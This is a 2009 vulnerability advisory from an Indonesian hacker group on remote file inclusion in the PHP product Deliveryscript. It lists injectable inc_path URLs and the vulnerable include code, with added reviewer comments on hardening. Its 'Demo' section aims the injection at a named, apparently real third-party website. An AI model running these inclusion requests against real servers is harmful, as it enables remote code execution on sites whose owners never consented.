#############################################################################
## Deliveryscript Multiple Remote File Inclusion Vulnerabilities ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : October 30, 2009 ##
#############################################################################
[ Software Information ]
[+] Vendor : http://www.deliveryscript.com/
[+] Download : -
[+] version : v25 or lower
[+] Price : - Unlimited = $199
- Professional = $99
- Standard = $39
[+] Vulnerability : RFI
[+] Dork : Think It
[+] Location : INDONESIA - JOGJA
#############################################################################
[ Vulnerable File ]
http://127.0.0.1/[PATH]/ds-inc/inc.php?inc_path=[INDONESIANCODER]
http://127.0.0.1/[PATH]/ds-inc/functions.php?inc_path=[INDONESIANCODER]
http://127.0.0.1/[PATH]/ds-inc/setups.php?inc_path=[INDONESIANCODER]
[ BUG IN ]
[+] inc.php
// inc.php: both includes are resolved relative to $inc_path, and nothing in
// this excerpt assigns that variable before it is used.
// NOTE(review): the advisory passes inc_path in the query string, so the value
// presumably reaches this scope through register_globals; the full file is not
// shown here, confirm against the shipped source.
// The include base should be fixed by the script itself (for example
// dirname(__FILE__) . '/') rather than taken from anything a client can set.
require_once($inc_path . 'functions.php');
require_once($inc_path . 'setups.php');
[+] Functions.php
// functions.php: loads every helper of the application, each path prefixed with
// $inc_path. No assignment of $inc_path is visible in this excerpt.
// NOTE(review): if the prefix is caller-controlled (the advisory supplies it as
// the inc_path query parameter, presumably via register_globals), the very
// first require_once already runs code from a location the caller chose, so
// none of the later includes matter. Confirm against the full file.
// Hardening: derive the base from dirname(__FILE__) inside this file, refuse
// direct HTTP access to ds-inc/, and keep allow_url_include disabled.

// Admin session helpers.
require_once($inc_path . 'functions/admin/function.invalidate_admin.php');
require_once($inc_path . 'functions/admin/function.is_valid_admin.php');
require_once($inc_path . 'functions/admin/function.set_valid_admin.php');
// SMS helper.
require_once($inc_path . 'functions/sms/function.send_clickatell_sms.php');
// Utility helpers (encryption, formatting, request metadata).
require_once($inc_path . 'functions/util/function._decrypt.php');
require_once($inc_path . 'functions/util/function._encrypt.php');
require_once($inc_path . 'functions/util/function.filesize_format.php');
require_once($inc_path . 'functions/util/function.get_host.php');
require_once($inc_path . 'functions/util/function.get_uri.php');
require_once($inc_path . 'functions/util/function.get_user_ip.php');
// Order, payment, download and notification helpers.
require_once($inc_path . 'functions/function._array_unique.php');
require_once($inc_path . 'functions/function.block_link.php');
require_once($inc_path . 'functions/function.download_file_exists.php');
require_once($inc_path . 'functions/function.generate_auth.php');
require_once($inc_path . 'functions/function.get_product.php');
require_once($inc_path . 'functions/function.is_blocked.php');
require_once($inc_path . 'functions/function.is_valid_download_request.php');
require_once($inc_path . 'functions/function.is_valid_payment.php');
require_once($inc_path . 'functions/function.notify_idevaffiliate.php');
require_once($inc_path . 'functions/function.process_order.php');
require_once($inc_path . 'functions/function.product_exists.php');
require_once($inc_path . 'functions/function.resend_order_email.php');
require_once($inc_path . 'functions/function.returned_txn_id_exists.php');
require_once($inc_path . 'functions/function.sectostr.php');
require_once($inc_path . 'functions/function.send_echeck_delay_notice.php');
require_once($inc_path . 'functions/function.send_manual_process_notice.php');
require_once($inc_path . 'functions/function.send_order_email.php');
require_once($inc_path . 'functions/function.txn_id_exists.php');
[+] setups.php
// setups.php: pulls in the mailer and XML setup files relative to $inc_path,
// which is not assigned anywhere in this excerpt.
// NOTE(review): same pattern as inc.php and functions.php. The prefix is
// presumably attacker-influenced when the file is requested directly with an
// inc_path parameter; confirm against the full file. Use a script-defined base
// directory instead of a variable the request can populate.
require_once($inc_path . 'setups/setup.phpmailer.php');
require_once($inc_path . 'setups/setup.phpxml.php');
[ Demo ]
http://prkg.com/wallstreet/ds-inc/inc.php?inc_path=[kaMtiEz]
http://prkg.com/wallstreet/ds-inc/functions.php?inc_path=[kaMtiEz]
http://prkg.com/wallstreet/ds-inc/setups.php?inc_path=[kaMtiEz]
[ FIX ]
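Don't know :P
Joke ;)
[+] Reviewer note: the include base must not come from the request. Set $inc_path inside each script (e.g. from dirname(__FILE__)) before the first require_once, and keep register_globals and allow_url_include off. Requests to ds-inc/*.php that carry an inc_path parameter are worth flagging in web server logs.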
#############################################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!
[ NOTE ]
[+] makasih buad babe and enyak ma ade .... muach ..
[+] AuraKasih ada apa dengan mu ???
[+] For M3NW5 Woi lu di tunggu Om Don Tukulesto tuh !! Malah ngilang ..
[+] For Don Tukulesto .. Nothing to say .. u are best !
[+] Buat Para IndonesianCoder dan kill-9 Member .. Tetap semangat !!!
[+] Malam Minggu jam setengah 8 .. Mau ngapel malah nemu Vulnerability .. wkwkkw